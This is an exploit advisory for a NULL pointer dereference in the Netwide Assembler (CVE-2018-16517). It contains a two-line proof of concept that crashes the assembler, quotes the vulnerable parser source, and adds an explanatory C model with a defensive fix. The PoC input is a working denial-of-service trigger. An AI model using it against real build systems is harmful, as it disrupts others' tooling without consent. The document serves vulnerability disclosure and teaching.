Netwide Assembler (NASM) 2.14rc15 NULL Pointer Dereference (PoC)

2019.04.24
Risk: Medium
Local: Yes
Remote: No
CWE: CWE-476


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Not required
Confidentiality impact: None
Integrity impact: None
Availability impact: Partial

# Exploit Title: Netwide Assembler (NASM) 2.14rc15 NULL Pointer Dereference (PoC)
# Date: 2018-09-05
# Exploit Author: Fakhri Zulkifli
# Vendor Homepage: https://www.nasm.us/
# Software Link: https://www.nasm.us/pub/nasm/releasebuilds/?C=M;O=D
# Version: 2.14rc15 and earlier
# Tested on: 2.14rc15
# CVE : CVE-2018-16517

asm/labels.c in Netwide Assembler (NASM) is prone to a NULL pointer dereference, which allows an attacker to cause a denial of service (assembler crash) via a crafted source file.

PoC:

1. echo "equ push rax" > poc
2. nasm -f elf poc

The first token of the line is the instruction "equ" (TOKEN_INSN), not an identifier (TOKEN_ID), and insn_is_label remains FALSE, so the label branch in parse_line() is not taken and result->label is left NULL. That NULL pointer is later dereferenced in islocal() when l[0] is read.

[...]
    if (i == TOKEN_ID || (insn_is_label && i == TOKEN_INSN)) {    <-- not taken
        /* there's a label here */
        first = false;
        result->label = tokval.t_charptr;
        i = stdscan(NULL, &tokval);
        if (i == ':') {         /* skip over the optional colon */
            i = stdscan(NULL, &tokval);
        } else if (i == 0) {
            nasm_error(ERR_WARNING | ERR_WARN_OL | ERR_PASS1,
                       "label alone on a line without a colon might be in error");
        }
        if (i != TOKEN_INSN || tokval.t_integer != I_EQU) {
            /*
             * FIXME: location.segment could be NO_SEG, in which case
             * it is possible we should be passing 'absolute.segment'. Look into this.
             * Work out whether that is *really* what we should be doing.
             * Generally fix things. I think this is right as it is, but
             * am still not certain.
             */
            define_label(result->label,
                         in_absolute ? absolute.segment : location.segment,
                         location.offset, true);
[...]

static bool islocal(const char *l)
{
    if (tasm_compatible_mode) {
        if (l[0] == '@' && l[1] == '@')
            return true;
    }
    return (l[0] == '.' && l[1] != '.');    <-- boom
}
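The following is an added example, not code from the advisory or from NASM. It is a reduced model of the bug path above: a stand-in tokenizer and parse_line() (assumed names; NASM's real stdscan()/parse_line() are far larger) leave the label NULL for the PoC line "equ push rax", islocal() is reproduced as quoted from asm/labels.c with no NULL check, and define_label_checked() is an assumed defensive fix that refuses a missing label before anything dereferences it. The fix shown is for illustration only and is not NASM's actual patch.

```c
/* Reduced model of the NULL-label path.  Added example, not NASM's code:
 * classify(), parse_line(), define_label_checked() and the constants are
 * assumed stand-ins; only islocal() follows the excerpt from asm/labels.c. */
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

enum { TOKEN_EOF = 0, TOKEN_ID, TOKEN_INSN };
enum { I_NONE = 0, I_EQU, I_PUSH };

struct token { int type; int insn; };

/* Stand-in for stdscan(): a word is an instruction if it is in this table,
 * otherwise it is treated as an identifier. */
static const char *const insn_names[] = { "", "equ", "push" };

static struct token classify(const char *word)
{
    struct token t = { TOKEN_ID, I_NONE };
    for (int k = I_EQU; k <= I_PUSH; k++) {
        if (strcmp(word, insn_names[k]) == 0) {
            t.type = TOKEN_INSN;
            t.insn = k;
        }
    }
    return t;
}

struct insn {
    char label_buf[64];
    const char *label;   /* points at label_buf, or NULL when the line has no label */
    int opcode;
};

/* Mirrors the quoted branch of parse_line(): a label is only recognised when
 * the first token is TOKEN_ID (insn_is_label is false here, as in the PoC).
 * "equ push rax" therefore leaves out->label == NULL.  Returns 0 on success,
 * -1 when the line is not of the form "[label] insn ...". */
int parse_line(const char *line, struct insn *out)
{
    char buf[128];
    const char *word;
    struct token t;

    out->label = NULL;
    out->opcode = I_NONE;
    if (strlen(line) >= sizeof buf)
        return -1;
    strcpy(buf, line);

    word = strtok(buf, " \t\r\n");
    if (!word)
        return -1;
    t = classify(word);
    if (t.type == TOKEN_ID) {               /* "there's a label here" */
        snprintf(out->label_buf, sizeof out->label_buf, "%s", word);
        out->label = out->label_buf;
        word = strtok(NULL, " \t\r\n");
        if (!word)
            return -1;
        t = classify(word);
    }
    if (t.type != TOKEN_INSN)
        return -1;
    out->opcode = t.insn;
    return 0;
}

/* Quick check helper: -1 = parse error, 0 = parsed without label, 1 = with label. */
int parse_label_status(const char *line)
{
    static struct insn scratch;
    if (parse_line(line, &scratch) != 0)
        return -1;
    return scratch.label != NULL ? 1 : 0;
}

/* As quoted from asm/labels.c: no NULL check, so islocal(NULL) reads address 0,
 * which is the crash in the PoC.  Never call it with NULL. */
bool islocal(const char *l, bool tasm_compatible_mode)
{
    if (tasm_compatible_mode) {
        if (l[0] == '@' && l[1] == '@')
            return true;
    }
    return (l[0] == '.' && l[1] != '.');
}

/* Assumed defensive stand-in for define_label(): reject a missing label before
 * anything dereferences it.  Returns 1 for a local label, 0 for a global one,
 * -1 when there is no label (the PoC case). */
int define_label_checked(const char *label, bool tasm_compatible_mode)
{
    if (label == NULL) {
        fprintf(stderr, "error: EQU not preceded by label\n");
        return -1;
    }
    return islocal(label, tasm_compatible_mode) ? 1 : 0;
}

int main(void)
{
    /* Constructed inputs: the PoC line from the advisory plus two well-formed EQUs. */
    const char *lines[] = { "equ push rax", "foo equ 1", ".loc equ 2" };
    struct insn ins;
    for (size_t i = 0; i < sizeof lines / sizeof lines[0]; i++) {
        if (parse_line(lines[i], &ins) != 0 || ins.opcode != I_EQU)
            continue;
        /* The vulnerable code would reach islocal(ins.label) here; the checked
         * path reports the missing label instead of crashing. */
        int r = define_label_checked(ins.label, false);
        printf("%-14s -> label=%s result=%d\n", lines[i],
               ins.label ? ins.label : "(null)", r);
    }
    return 0;
}
```

The model keeps the shape of the real bug: the parser has a legitimate reason to leave the label pointer NULL (no label on the line), and the crash comes from a consumer that assumes it never is. The cheap, durable fix is to validate the pointer at the boundary where the EQU is handled, as define_label_checked() does, rather than sprinkling NULL checks into every string helper such as islocal().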


Copyright 2019, cxsecurity.com
